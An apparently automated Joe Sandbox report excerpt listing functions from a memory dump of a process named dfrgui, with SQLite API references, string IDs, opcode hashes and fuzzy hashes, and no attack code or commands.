                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_free
                                                                                              • String ID:
                                                                                              • API String ID: 2313487548-0
                                                                                              • Opcode ID: f0b11a29783efd7e7c8c14ce528e1fd951f247dcb29d9c1997e282895af9f18b
                                                                                              • Instruction ID: c9ecf57121f205e21a64120e8e7d9f7e16678beb486510b2cd97e0988e13cc88
                                                                                              • Opcode Fuzzy Hash: f0b11a29783efd7e7c8c14ce528e1fd951f247dcb29d9c1997e282895af9f18b
                                                                                              • Instruction Fuzzy Hash: 3E110AB4644749CBCB00BFB9D4D5418BBE4EF88249B56889EDCD48B316D734DCA0CB51
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: false$null$true
                                                                                              • API String ID: 0-2913297407
                                                                                              • Opcode ID: 1b7217d25a7ccf5db1b935dde52d08845e5cac3b756602c3385ce55b2d5ba532
                                                                                              • Instruction ID: b515f5fb262dc7e69db8de8e4b8dd747f6da3dfa92c6f7e45f079b22d579be8f
                                                                                              • Opcode Fuzzy Hash: 1b7217d25a7ccf5db1b935dde52d08845e5cac3b756602c3385ce55b2d5ba532
                                                                                              • Instruction Fuzzy Hash: C3C1BD71E09265CBDB048FA8C4C079DBBB2ABCA318F29C16ED9449B346C735D846CB61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • sqlite3_mprintf.SQLITE3 ref: 61E3C450
                                                                                                • Part of subcall function 61E395AF: sqlite3_initialize.SQLITE3 ref: 61E395B5
                                                                                                • Part of subcall function 61E395AF: sqlite3_vmprintf.SQLITE3 ref: 61E395CF
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_initializesqlite3_mprintfsqlite3_vmprintf
                                                                                              • String ID: + $ NOT $ OR $"$(,)?
                                                                                              • API String ID: 2841607023-154350868
                                                                                              • Opcode ID: 27e9f43b54149d7c394525757cfdc6c9a5f9a57b38e4620f51e1f8706cbe1aae
                                                                                              • Instruction ID: c8fccd9bd3694b095a3720a09c7d51eb80419f676326d0fe8e24e2f2d46415ae
                                                                                              • Opcode Fuzzy Hash: 27e9f43b54149d7c394525757cfdc6c9a5f9a57b38e4620f51e1f8706cbe1aae
                                                                                              • Instruction Fuzzy Hash: 4C917B75A082759FDB01CFA8C48069DBBF0BF89704F25C96ED858AB341D374E841CBA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: Sleep_amsg_exit
                                                                                              • String ID: 08aMingw-w64 runtime failure:$ti
                                                                                              • API String ID: 1015461914-2860349212
                                                                                              • Opcode ID: 52eab1edccf3adb4b628cb2c6d7ef23c0ba83e74d032204e76fbfc2283c5ace6
                                                                                              • Instruction ID: 5673fdc63cd166ac4d0bd20e0611f73cafa879edd8eeb223e9da6bff0d02e2ac
                                                                                              • Opcode Fuzzy Hash: 52eab1edccf3adb4b628cb2c6d7ef23c0ba83e74d032204e76fbfc2283c5ace6
                                                                                              • Instruction Fuzzy Hash: 1F418FB1614A818BEB00EFE9C58431ABBF1EB8674DF25C93DD4948F344E775D8908B82
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • sqlite3_malloc64.SQLITE3 ref: 61E77BDE
                                                                                              • sqlite3_exec.SQLITE3 ref: 61E77C11
                                                                                              • sqlite3_free_table.SQLITE3 ref: 61E77C2B
                                                                                              • sqlite3_free.SQLITE3 ref: 61E77C3F
                                                                                              • sqlite3_mprintf.SQLITE3 ref: 61E77C52
                                                                                              • sqlite3_free.SQLITE3 ref: 61E77C5F
                                                                                              • sqlite3_free.SQLITE3 ref: 61E77C78
                                                                                                • Part of subcall function 61E0A119: sqlite3_mutex_enter.SQLITE3 ref: 61E0A138
                                                                                              • sqlite3_free_table.SQLITE3 ref: 61E77C8D
                                                                                                • Part of subcall function 61E0A2DD: sqlite3_free.SQLITE3 ref: 61E0A30B
                                                                                              • sqlite3_realloc64.SQLITE3 ref: 61E77CB1
                                                                                              • sqlite3_free_table.SQLITE3 ref: 61E77CC3
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_free$sqlite3_free_table$sqlite3_execsqlite3_malloc64sqlite3_mprintfsqlite3_mutex_entersqlite3_realloc64
                                                                                              • String ID:
                                                                                              • API String ID: 3621699333-0
                                                                                              • Opcode ID: 49cdd410d009c5c60e6dc54a98cf30d01d919e68cd65b05123a3aab6e8fa3962
                                                                                              • Instruction ID: 2bb0315b9fd8656c7dfc11135548e8cf224f3702bbfcb23244ab88d3c114d46b
                                                                                              • Opcode Fuzzy Hash: 49cdd410d009c5c60e6dc54a98cf30d01d919e68cd65b05123a3aab6e8fa3962
                                                                                              • Instruction Fuzzy Hash: 6551D0B0A053599BEB10DFA8D58479EBBF5FF88308F208429E894AB350D775E950CF51
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • sqlite3_step.SQLITE3(?,?,?,?,?,?,?,00000004,?,?,61E7F9F2), ref: 61E7F0EC
                                                                                              • sqlite3_finalize.SQLITE3 ref: 61E7F16C
                                                                                              • sqlite3_finalize.SQLITE3 ref: 61E7F1BB
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_finalize$sqlite3_step
                                                                                              • String ID: integer$null$real$#a
                                                                                              • API String ID: 2395141310-14704807
                                                                                              • Opcode ID: f700a5ffa2a6a0ab3cfd5d6dbd466371d8c59f7b378ec2fdfab1408dbda561cf
                                                                                              • Instruction ID: 4bd31f607a4e8361d1f2f8ac55677c15498f9f18ac8b1eaa9c52af6293c1e55d
                                                                                              • Opcode Fuzzy Hash: f700a5ffa2a6a0ab3cfd5d6dbd466371d8c59f7b378ec2fdfab1408dbda561cf
                                                                                              • Instruction Fuzzy Hash: DE5128B09047558FDB14CF69D480A5ABBF0FF89324F25C96DD858AB311D378E881CB95
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_freesqlite3_malloc
                                                                                              • String ID:
                                                                                              • API String ID: 423083942-0
                                                                                              • Opcode ID: 9707b4d36566ebc79409bd4c0694eb43f5f6542578b6686b74c4430cd1e9a97e
                                                                                              • Instruction ID: 1063ebef09cc3e7b4e504a40b563ff33675709cdf6d7ccb25422242ac10cb902
                                                                                              • Opcode Fuzzy Hash: 9707b4d36566ebc79409bd4c0694eb43f5f6542578b6686b74c4430cd1e9a97e
                                                                                              • Instruction Fuzzy Hash: 7D029F74E09219DFDB04CFA8D581A8EBBF2BF48314F25C559E854AB319D730E942CB90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • sqlite3_value_text.SQLITE3 ref: 61E26F4E
                                                                                              • sqlite3_result_error_toobig.SQLITE3 ref: 61E2702F
                                                                                              • sqlite3_result_error_nomem.SQLITE3 ref: 61E27055
                                                                                              • sqlite3_snprintf.SQLITE3 ref: 61E272D1
                                                                                              • sqlite3_snprintf.SQLITE3 ref: 61E272FE
                                                                                              • sqlite3_snprintf.SQLITE3 ref: 61E27308
                                                                                              • sqlite3_snprintf.SQLITE3 ref: 61E2736E
                                                                                              • sqlite3_result_text.SQLITE3 ref: 61E27491
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_snprintf$sqlite3_result_error_nomemsqlite3_result_error_toobigsqlite3_result_textsqlite3_value_text
                                                                                              • String ID:
                                                                                              • API String ID: 2444656285-0
                                                                                              • Opcode ID: 94af4734501517e793e48dc2c573e3313890df8ca510069b24fcfa55a766f326
                                                                                              • Instruction ID: 4d44793e144b9a2820f313a2eebc91827e5b5ebf833259aae5da6bbc5cf3bc7c
                                                                                              • Opcode Fuzzy Hash: 94af4734501517e793e48dc2c573e3313890df8ca510069b24fcfa55a766f326
                                                                                              • Instruction Fuzzy Hash: 73E1AF71D4839ACBDB208F58C8A0B99BBF1BF5A304F65C4A9D89897340D774D9C68F42
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_snprintf$sqlite3_result_textsqlite3_result_value
                                                                                              • String ID:
                                                                                              • API String ID: 336169149-0
                                                                                              • Opcode ID: 3df200b8f1a461f68bdf788d93f5251158f3aaba308a0e17f2d3a28bf19232aa
                                                                                              • Instruction ID: 59a9193cccddd2f1c043736338f9cfac766812144d87cb7bc14d8ff9515d2e2d
                                                                                              • Opcode Fuzzy Hash: 3df200b8f1a461f68bdf788d93f5251158f3aaba308a0e17f2d3a28bf19232aa
                                                                                              • Instruction Fuzzy Hash: FD61BEB0A0C39A8ED7019F68C8A475ABFE2AB95318F29C55CE4C84B395D775C845CB42
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_get_auxdata$memcmpsqlite3_freesqlite3_malloc64sqlite3_result_error_nomemsqlite3_set_auxdatasqlite3_value_bytessqlite3_value_text
                                                                                              • String ID:
                                                                                              • API String ID: 3041890313-0
                                                                                              • Opcode ID: 375577031df126b08e877b7a2233b6e8f0c4f2ad026f26e897456626cc130d63
                                                                                              • Instruction ID: d4c2781f6638f3cfb7ffd437c6556cfc8ea3dcd392fb2c339905c271e7fd5172
                                                                                              • Opcode Fuzzy Hash: 375577031df126b08e877b7a2233b6e8f0c4f2ad026f26e897456626cc130d63
                                                                                              • Instruction Fuzzy Hash: 6251D4B0A042698FCB40DFB9C584A9EBBF0AF8C318F608569E854EB340E734D981CF51
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: memcmp$sqlite3_free$sqlite3_malloc64
                                                                                              • String ID: 0
                                                                                              • API String ID: 3361124181-4108050209
                                                                                              • Opcode ID: 0dccca72ba2fd4d36ecec91ec5d10b117968ee10b702043cb1b1ea2e9803f18f
                                                                                              • Instruction ID: 0768fe1081e9b69e3edf410ef168a4202b288a9bf622709cf2342c0b78c84549
                                                                                              • Opcode Fuzzy Hash: 0dccca72ba2fd4d36ecec91ec5d10b117968ee10b702043cb1b1ea2e9803f18f
                                                                                              • Instruction Fuzzy Hash: 48E11370A042698BDB11CFA8C88078DBBF1BF89318F25856AD859EB355D736D886CF41
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: Virtual$ProtectQueryabortfwritevfprintf
                                                                                              • String ID: @
                                                                                              • API String ID: 1503958624-2766056989
                                                                                              • Opcode ID: fdd9a4d83f785c7ac4a36669a548c3c4cf55efd1698a5651848bcc39e431dc4c
                                                                                              • Instruction ID: 3cc158fa83f7a296c613447eb15a0efa60065617e1f84f2c8de968e689c570ef
                                                                                              • Opcode Fuzzy Hash: fdd9a4d83f785c7ac4a36669a548c3c4cf55efd1698a5651848bcc39e431dc4c
                                                                                              • Instruction Fuzzy Hash: 7A41F3B1915B428FE710EF69C58461ABBE0FF85354F64CD2DE8989B350E734E884CB52
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • sqlite3_aggregate_context.SQLITE3 ref: 61E32F19
                                                                                              • sqlite3_value_text.SQLITE3 ref: 61E32F42
                                                                                              • sqlite3_value_bytes.SQLITE3 ref: 61E32F4F
                                                                                              • sqlite3_str_append.SQLITE3 ref: 61E32F6F
                                                                                              • sqlite3_value_text.SQLITE3 ref: 61E32F79
                                                                                              • sqlite3_value_bytes.SQLITE3 ref: 61E32F85
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_value_bytessqlite3_value_text$sqlite3_aggregate_contextsqlite3_str_append
                                                                                              • String ID: ,)?
                                                                                              • API String ID: 2741546359-1010226240
                                                                                              • Opcode ID: 7d8635f7cfc349ada74e2eb2be3546356384360816e71fcc08cd628a256cc39b
                                                                                              • Instruction ID: f5b833d64daf783a2577a34218afbc38f8240d23d1cfda83196c7f49aefc02f2
                                                                                              • Opcode Fuzzy Hash: 7d8635f7cfc349ada74e2eb2be3546356384360816e71fcc08cd628a256cc39b
                                                                                              • Instruction Fuzzy Hash: 98215975A046468FD700DF69C484A5ABBE1FFC8364F25C92EE8988B300D775D882CB81
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • sqlite3_aggregate_context.SQLITE3 ref: 61E38381
                                                                                              • sqlite3_result_error_nomem.SQLITE3 ref: 61E383AE
                                                                                              • sqlite3_result_text.SQLITE3 ref: 61E383DF
                                                                                              • sqlite3_result_text.SQLITE3 ref: 61E3842D
                                                                                              • sqlite3_result_subtype.SQLITE3 ref: 61E3843D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_result_text$sqlite3_aggregate_contextsqlite3_result_error_nomemsqlite3_result_subtype
                                                                                              • String ID: J
                                                                                              • API String ID: 3250357221-1141589763
                                                                                              • Opcode ID: 2a0d1d657c8e282c949d41eaad7b25c1b9e45e0c253af6e887945158fe09f359
                                                                                              • Instruction ID: ec653ec6287599f0c595cfbfd3c38c3a41db07598e0b1053ff37f467178e8482
                                                                                              • Opcode Fuzzy Hash: 2a0d1d657c8e282c949d41eaad7b25c1b9e45e0c253af6e887945158fe09f359
                                                                                              • Instruction Fuzzy Hash: F0215BB05087519FDB009F28C48560ABFE0BFC5768F64CA5DE8A8CB785D374C851DB92
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • sqlite3_aggregate_context.SQLITE3 ref: 61E381EF
                                                                                              • sqlite3_result_error_nomem.SQLITE3 ref: 61E3821A
                                                                                              • sqlite3_result_text.SQLITE3 ref: 61E3824B
                                                                                              • sqlite3_result_text.SQLITE3 ref: 61E38299
                                                                                              • sqlite3_result_subtype.SQLITE3 ref: 61E382A9
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_result_text$sqlite3_aggregate_contextsqlite3_result_error_nomemsqlite3_result_subtype
                                                                                              • String ID: J
                                                                                              • API String ID: 3250357221-1141589763
                                                                                              • Opcode ID: ee44083692571ff0bb79daf76e6c4e2e5c149ce10d701330d4f3484b551bddaa
                                                                                              • Instruction ID: 16bf8918ab645b76a71af769fa2177cb1ee8791df48233cbdeb5ed20f232067a
                                                                                              • Opcode Fuzzy Hash: ee44083692571ff0bb79daf76e6c4e2e5c149ce10d701330d4f3484b551bddaa
                                                                                              • Instruction Fuzzy Hash: 8A2130B0508B519BDB109F69C48560ABBE0BFC5728F24CA5DECA88B389D374C851DB92
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_freesqlite3_mutex_entersqlite3_randomness$sqlite3_malloc64sqlite3_mutex_leave
                                                                                              • String ID:
                                                                                              • API String ID: 1657278834-0
                                                                                              • Opcode ID: 037ae5b8c333d34cbbec6e3d9a0049126deeb791c701d5475eb786d43c0ed2a5
                                                                                              • Instruction ID: 8068adcc6f0b1ad646351a18687d857129ab8cdedc007b65eee18779acbddef4
                                                                                              • Opcode Fuzzy Hash: 037ae5b8c333d34cbbec6e3d9a0049126deeb791c701d5475eb786d43c0ed2a5
                                                                                              • Instruction Fuzzy Hash: C3B15C75E0924A9BCF00CFA8C48068DB7F1FF9A714F28C96AE864AB354D734E945CB51
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: memcmpsqlite3_value_text$sqlite3_freesqlite3_result_textsqlite3_value_bytes
                                                                                              • String ID:
                                                                                              • API String ID: 3386002893-0
                                                                                              • Opcode ID: f64447981622f53cecfa20fa162f52d556e154730efa79d9c09943a78c8dcd64
                                                                                              • Instruction ID: f05443a4a6d11a3577d3b07827b37d9fe96948bfa4a033d1d3c2008329084dbf
                                                                                              • Opcode Fuzzy Hash: f64447981622f53cecfa20fa162f52d556e154730efa79d9c09943a78c8dcd64
                                                                                              • Instruction Fuzzy Hash: 24619F71E042568FDB01CFA8C5A0A9DBBF1AF99314F25C56EE895AB390D730DC41CB61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: invalid rootpage$orphan index
                                                                                              • API String ID: 0-4061570254
                                                                                              • Opcode ID: b6d04ae7ccb6def1b923bab4c7159ad02e584b906af7b37076cfa7070bd1cc2e
                                                                                              • Instruction ID: 4692fa2f0f1ad511ff841e00a3feedf71fcc3f2a9b0da536d8eb7a991d4b5170
                                                                                              • Opcode Fuzzy Hash: b6d04ae7ccb6def1b923bab4c7159ad02e584b906af7b37076cfa7070bd1cc2e
                                                                                              • Instruction Fuzzy Hash: 4E51AC74A043458FEB62CF68C480B9ABBF1AF89308F24C56DE8998F351D731D842CB51
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • sqlite3_result_error.SQLITE3 ref: 61E3C783
                                                                                              • sqlite3_value_int.SQLITE3 ref: 61E3C795
                                                                                              • sqlite3_value_text.SQLITE3 ref: 61E3C7AB
                                                                                              • sqlite3_value_text.SQLITE3 ref: 61E3C7B9
                                                                                              • sqlite3_result_text.SQLITE3 ref: 61E3C89B
                                                                                              • sqlite3_free.SQLITE3 ref: 61E3C8A6
                                                                                              • sqlite3_result_error_code.SQLITE3 ref: 61E3C8BC
                                                                                              Memory Dump Source
